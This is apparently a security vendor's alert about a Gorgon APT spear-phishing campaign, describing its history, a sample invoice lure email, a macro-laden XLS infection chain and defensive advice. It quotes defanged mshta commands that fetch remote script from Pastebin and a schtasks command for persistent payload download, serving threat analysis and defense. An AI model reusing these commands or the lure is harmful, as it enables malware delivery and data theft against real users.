SECURITY ALERT: Gorgon APT Targets Corporate Emails with Spear Phishing Campaign
How the Gorgon APT behaved in the past. How the new spear phishing campaign looks like.
The Gorgon APT (Advanced Persistent Threat) is an older but dangerous online threat, first discovered by Unit 42 researchers in February 2018.
The group behind the Gorgon APT was revealed back when the researchers were still investigating Subaat, an attacker, when they realized that they were probably part of a larger group targeting governmental organizations.
The History of Attacks by Gorgon APT
Ever since its initial discovery in February 2018, the Gorgon APT was orchestrating attacks both on government organizations (in the United States, United Kingdom, Russia, Spain, and others) and on corporate targets around the world.
The Gorgon group has often shared infrastructure when performing criminal and nation-state targeted attacks. This made the APT easier to track across these operations.
Within the Gorgon APT infrastructure, the researchers were able to identify several crimeware family samples, including Trojans, RATs like NjRat and info stealers such as LokiBot. These were all hosted on the command and control (C2) domain of the Gorgon group.
Interestingly, the Gorgon APT didn’t just use the traditional C2 strategies we could expect from it. It also used a variety of URL shortening services in order to download its payloads. This made its criminal activity more wide-spread and potentially more complex to track down, identify and eradicate.
The Current Spear Phishing Campaign by Gorgon APT
While the activities of the Gorgon APT flared on and off from February 2018 until now, the group is now back strongly with a new spear-phishing campaign.
So far, the targets we have intelligence about are located in Europe, but everyone else should be on guard too. It begins with an email containing this text (sanitized for your safety):
Subject:
Re: Invoice_74521451
Content:
Dear Sir
My colleague handling this order is out of office for his vacation.
Please confirm the attached invoice as enabling us to proceed with the payment schedule.
Regards,
Sri Astuti
Attached:
Invoice_74521451.xls
As you can see, the bait here is the attached Excel document. Once the target clicks it, the malicious file will deliver the payload. The XLS file contains macro / VBA code which gets enabled once the document is opened.
Just like in its previous attacks, the Gorgon APT then connects to Pastebin and downloads and runs an obfuscated Javascript / VBA code from there.
This is done by spawning a shell with the following command:
mshta http://bit[.]ly/mydahsgkjshwodakiterikus
–>
C:\Windows\System32\mshta.exe” http://www.pastebin[.]com/raw/0php6n7G
This leads to several layers of unescape obfuscation that redirects the traffic to a number of other Pastebin addresses (sanitized for your safety):
http:\\pastebin[.]com\raw\TNnFtBjw
–>
http:\\pastebin[.]com\raw\3qUvqbpZ
It creates a scheduled task that ensures that the payload is continuously downloaded (sanitized for your safety):
C:\Windows\System32\schtasks.exe” /create /sc MINUTE /mo 300 /tn “DEFENDER Backup” /tr “mshta http:\\pastebin[.]com\raw\3qUvqbpZ”
A total of three script obfuscation methods are used: “StrReverse”, “split variables” and “multiple Wscript objects”.
The payload uses the function “LoadWithPartialName” via “reflection assembly” in the NET framework in order to download and process raw data in memory.
The final payload is a data stealer that communicates with multiple domains, all of which have already been blocked in Heimdal’s Heimdal™ Threat Prevention engine.
The malicious XLS document is detected by 8 out of 57 Antivirus products listed by VirusTotal. This means that you can’t rely solely on your Antivirus to stay safe.
How to Stay Safe from the Gorgon APT and other Spear Phishing Campaigns:
#1. Don’t trust emails from people you don’t know
As much as possible, do not open attachments or click links from emails coming from unknown contacts. I know that in a professional environment this is virtually impossible but try to do your best.
Heimdal® Email Security
- Completely secure your infrastructure against email-delivered threats;
- Deep content scanning for malicious attachments and links;
- Block Phishing and man-in-the-email attacks;
- Complete email-based reporting for compliance & auditing requirements;
You can read the emails, but don’t click links or open attachments until you establish more contact background. Reach out and ask the sender to remind you where you were acquainted or what deal they are bringing up.
Ideally, find a way to verify the sender legitimacy independent of further email threads. Pick up the phone and give them a call. Ask who introduced you if they are legit and how well do they know them.
#2. Don’t enter your credentials anywhere without extra checks
If you find yourself on a website or portal that looks like one you trust (Google, Facebook, Outlook, Salesforce, etc.) but which asks you to re-enter your credentials, don’t do it. No matter how much it looks like the real deal, it could be a spear-phishing attempt.
Make sure you check and double-check that the website address is correct, with no alterations. If you have any doubts, don’t enter your credentials. If it’s indeed necessary, you will be prompted to do it in the mail portal / app that you use, anyway.
#3. Have an email security solution firmly in place
Run your incoming emails through a solution which prevents BEC attacks, to make sure online crooks are not trying to fool you. Business Email Compromise (BEC) attacks are a growing threat and your email spam filter or firewall are not enough to halt it.
Final word
Last, but not least, stay vigilant. Learn how social engineering works, and how cybercriminals can get into your accounts. Keep learning more about cybersecurity so nothing can catch you by surprise.
If you’re interested, sign up for our Cybersecurity Course for Beginners. It’s completely free and you can learn everything at your own pace. Stay safe!